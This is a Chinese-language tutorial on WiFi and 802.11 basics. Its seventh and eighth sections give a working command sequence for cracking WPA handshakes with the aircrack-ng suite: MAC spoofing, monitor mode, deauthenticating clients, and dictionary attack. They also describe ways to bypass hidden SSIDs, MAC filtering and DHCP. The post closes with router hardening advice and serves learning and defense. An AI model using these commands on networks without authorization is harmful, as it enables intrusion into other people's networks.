1.wifi是什么
WiFi是Wireless Fidelity(无线高保真)是一种商业认证, 符合IEEE 802.11无线网络规范,是一种WLAN标准, 很多时候都把Wi-Fi等同于WLAN理解。 WLAN是Wireless LAN(无线局域网),基于IP的的通信,采用2.4GHz或5.8GHz无线频段(ISM频段)传输, IEEE在WLAN方面的工作只定义了二层以下的协议, 目前主要集中在安全性、AP之间的信令、频谱扩展等方面。
wifi版本
最新的 802.11 ax 标准也将定义为 WiFi6,之前的 802.11 a/b/g/n/ac 依次追加为 WiFi1/2/3/4/5。 正在使用最广泛是wifi4也就是802.11n标准,最大600Mb/s,wifi6最大11G/s。 本系列内容也是基于wifi4来学习的。
2.802.11系列协议
802.11系列标准,IEEE制定的一个无线局域网标准, 主要用于解决局域网中,用户与用户终端的无线接入。
定义了基于端口的网络接入控制协议, 该协议适用于接入设备与接入端口间点到点的连接方式, 其中端口可以是物理端口,也可以是逻辑端口。 是用于用户接入认证的,认证通过则端口对用户开启。
802.11协议定义了无线局域网的物理层以及MAC层标准, 定义了物理层数据的传输方式,在MAC层采用了类似于有线以太网的CSMA/CA协议。
802.11协议定义了WLAN物理层以及MAC层的协议标准
物理层由三部分组成: 物理层管理层、 物理层会聚协议(PLCP) 和物理介质依赖子层(PMD)。 数据链路层由两部分组成: 逻辑连接控制子层(LLC)、媒体访问控制子层(MAC)。 802.11 MAC层负责客户端与AP之间的通讯。 主要功能包括:扫描、接入、认证、加密、漫游和同步。
数据从链路层向物理层传递:
MSDU(MAC service Data Unit),指的就是网络层发来的包。
然后加以MAC层的包头就构成一个MPDU,
再加PHY层的包头以及前导码构成PPDU。
小结:
简单来说wifi是802.11标准实现,
只在七层网络协议中的物理层和链路层,
并且只是链子层的mac层(媒体访问控制层)。
物理层是对信号进行收发,
链路层对物理层访问获取,数据分组,错误检测。
3.ap client bss bssid ssid 关系
一个ap(access point)和一个client(STA)组成最小的bss(basic service set), 有个bssid表识(MAC地址),扫描时有个ssid名称(wifi名称)。 同一个ssid下,可以有不同的ap,不同ap有不同信道和不同bssid。
4.Windows查看网卡扫描到的wifi
netsh wlan show networks //扫描到的wifi列表不显示mac地址 netsh wlan show networks mode=bssid //扫描到的wifi列表:名称和mac地址,加密方式,无线标准,信道 netsh wlan show interfaces //当前正连接中wifi信息。 netsh wlan show profiles //显示连接过的wifi名称。 netsh wlan show profile name=wifi名称 key=clear //显示具体某个wifi详细信息。
5.windows查看网络连接:
ipconfig /all //显示详细信息 ipconfig //显示关键信息
6.kali适配的网卡
https://www.aircrack-ng.org/doku.php?id=compatibility_drivers
https://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles.html
7.暴力破解
测试环境:kali系统和支持监听模式无线网卡 通过抓取握手包对握手包暴力破解。 ifconfig //查看网络接口 sudo macchanger -m 10:11:22:33:44:55 wlan0 //修改网卡mac sudo airmon-ng start wlan0 //将网卡wlan0开启监听模式 sudo airodump-ng wlan0mon //扫描整个wifi网络 sudo airodump-ng -c 信道 --bssid mac地址 wlan0mon //查看指定mac地址的wifi,主要看正连接的客户端 //抓取握手包 sudo airodump-ng -c 信道--bssid mac地址 -w 握手包文件名称 wlan0mon //断开连接中客户端,以便抓握手包 sudo aireplay-ng --deauth 9 -a wifi的mac -c 连接中的mac wlan0mon aircrack-ng -w /usr/字典密码.txt /home/握手包.cap //暴力破解
8.绕过一些限制的思路
1.获取隐藏ssid:必须有正在连接的客户端才能扫描到名字。 工具:common view for wifi /kali 2.绕过mac过滤:查看网络中正在连接的mac,然后修改自己的mac。 工具:common view for wifi/kali 3.绕过dhcp两种方式: 1)首先自定义ip连入网络,然后wireshark流量扫描猜测出ip范围,然后网段扫描ip和端口。 工具:scanport确认网关(网关一般是开通80端口) 2)可以通过流量分析找到wifi的mac地址得到网关ip。 工具:wireshark
9.wifi防御:
1.路由不用默认密码,wifi密码复杂,mac过滤,wpa2(aes)加密方式,ssid不广播 2.只允许特定mac访问管理路由(位置:家长控制) 3.关闭dhcp(不分配ip) 4.关闭wps(ping) 5.关闭upnp即插即用协议(位置:转发规则) 6.关闭wds(中继/桥接功能,位置:基本设置),专门设置桥接可让wifi路由来连接(类似再开一个热点) 7.开启防ddos功能 8.开启ap隔离(局域网用户隔离不能互相通信) 9.增强认证:802.1x或web认证类似校园网/cmcc/chinanet